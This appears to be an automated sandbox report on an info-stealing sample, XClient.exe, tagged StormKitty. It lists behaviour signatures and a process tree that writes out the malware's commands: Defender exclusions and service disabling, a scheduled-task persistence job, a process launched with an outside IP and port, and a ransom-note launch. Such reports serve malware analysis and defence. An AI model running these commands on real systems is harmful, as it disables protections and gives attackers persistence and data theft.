Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    300s
  • max time network
    305s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/11/2023, 21:53

General

  • Target

    XClient.exe

  • Size

    61KB

  • MD5

    6be4a7c074dc461c8c9e74bedaf5c41d

  • SHA1

    0535964d5cf5e58c7608722d65767c9a33bda831

  • SHA256

    c3e67eaa81c08b734fd310644df2e2777e86fb89e37eeaa5a5f542528f4cf4f3

  • SHA512

    d488d4656709a49a680260c7db653744795d5050f5eaa4449e2aa214056f2a5bb89c66a3e87a23aba9f42582ff2a03d7d11be32333ffe22591dc23b8d1227d6c

  • SSDEEP

    1536:1Zhz2/YIkg4dbxkbZqxwmAi+6zwoOUSBJX3:1ZhAYIkgobxkbZFiTOUcJn

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 16 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 48 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Checks computer location settings
    • Drops startup file
    • Loads dropped DLL
    • Adds Run key to start application
    • Sets desktop wallpaper using registry
    • Suspicious use of SetThreadContext
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4256
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4340
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1912
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      2⤵
      • Creates scheduled task(s)
      PID:4584
    • C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" qc windefend
      2⤵
      • Launches sc.exe
      PID:4304
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
      2⤵
        PID:4788
      • C:\Windows\system32\whoami.exe
        "C:\Windows\system32\whoami.exe" /groups
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1688
      • C:\Windows\system32\net1.exe
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        2⤵
          PID:3452
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 209.25.141.181 17209 adlan1122 2617FA5A3A857DA61E26
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4572
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3308
            • C:\Windows\SysWOW64\explorer.exe
              "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
              4⤵
                PID:4048
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
              3⤵
              • Enumerates system info in registry
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:3376
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xf8,0x12c,0x7ffb33ea9758,0x7ffb33ea9768,0x7ffb33ea9778
                4⤵
                  PID:3384
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1720 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:2
                  4⤵
                    PID:1612
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=2060 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:8
                    4⤵
                      PID:4416
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=2176 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:8
                      4⤵
                        PID:1316
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3164 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:1
                        4⤵
                          PID:920
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3176 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:1
                          4⤵
                            PID:2304
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4484 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:1
                            4⤵
                              PID:4404
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4588 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:8
                              4⤵
                                PID:2192
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4832 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:8
                                4⤵
                                  PID:4324
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5092 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:8
                                  4⤵
                                    PID:4508
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5180 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:8
                                    4⤵
                                      PID:1748
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5104 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:8
                                      4⤵
                                        PID:1676
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4892 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:8
                                        4⤵
                                          PID:5720
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5276 --field-trial-handle=1860,i,3570644929344317115,10975466235903589490,131072 /prefetch:8
                                          4⤵
                                            PID:5736
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
                                        2⤵
                                        • Enumerates system info in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:5908
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb345146f8,0x7ffb34514708,0x7ffb34514718
                                          3⤵
                                            PID:5956
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
                                            3⤵
                                              PID:3992
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                                              3⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3648
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
                                              3⤵
                                                PID:1676
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                                                3⤵
                                                  PID:4332
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                                                  3⤵
                                                    PID:3552
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
                                                    3⤵
                                                      PID:5400
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
                                                      3⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:5412
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
                                                      3⤵
                                                        PID:2360
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
                                                        3⤵
                                                          PID:5572
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                                          3⤵
                                                            PID:3432
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9623309862237813648,16634113264503233185,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
                                                            3⤵
                                                              PID:4484
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --new-window "data:text/html,<title>Welcome Chrome Browser</title>" --mute-audio --disable-audio
                                                            2⤵
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:5024
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb33ea9758,0x7ffb33ea9768,0x7ffb33ea9778
                                                              3⤵
                                                                PID:3272
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=1864,i,4629987284977320858,17362322994892152956,131072 /prefetch:2
                                                                3⤵
                                                                  PID:1744
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --mojo-platform-channel-handle=2144 --field-trial-handle=1864,i,4629987284977320858,17362322994892152956,131072 /prefetch:8
                                                                  3⤵
                                                                    PID:5460
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mute-audio --mojo-platform-channel-handle=2252 --field-trial-handle=1864,i,4629987284977320858,17362322994892152956,131072 /prefetch:8
                                                                    3⤵
                                                                      PID:1408
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=1864,i,4629987284977320858,17362322994892152956,131072 /prefetch:1
                                                                      3⤵
                                                                        PID:3680
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2964 --field-trial-handle=1864,i,4629987284977320858,17362322994892152956,131072 /prefetch:1
                                                                        3⤵
                                                                          PID:4116
                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                      1⤵
                                                                        PID:1392
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                                          2⤵
                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2160
                                                                          • C:\Windows\system32\sc.exe
                                                                            "C:\Windows\system32\sc.exe" qc windefend
                                                                            3⤵
                                                                            • Launches sc.exe
                                                                            PID:3304
                                                                          • C:\Windows\system32\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                            3⤵
                                                                              PID:4276
                                                                            • C:\Windows\system32\whoami.exe
                                                                              "C:\Windows\system32\whoami.exe" /groups
                                                                              3⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1848
                                                                            • C:\Windows\system32\net1.exe
                                                                              "C:\Windows\system32\net1.exe" stop windefend
                                                                              3⤵
                                                                                PID:3680
                                                                              • C:\Windows\system32\sc.exe
                                                                                "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:1808
                                                                          • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                            C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1080
                                                                          • C:\Windows\explorer.exe
                                                                            C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                            1⤵
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: AddClipboardFormatListener
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:1320
                                                                          • C:\Windows\System32\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
                                                                            1⤵
                                                                              PID:1792
                                                                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                              1⤵
                                                                                PID:3988
                                                                              • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:5660
                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                1⤵
                                                                                  PID:6080
                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                  1⤵
                                                                                    PID:1416
                                                                                  • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                    C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4548
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                    1⤵
                                                                                    • Enumerates system info in registry
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:5816
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffb33ea9758,0x7ffb33ea9768,0x7ffb33ea9778
                                                                                      2⤵
                                                                                        PID:5556
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
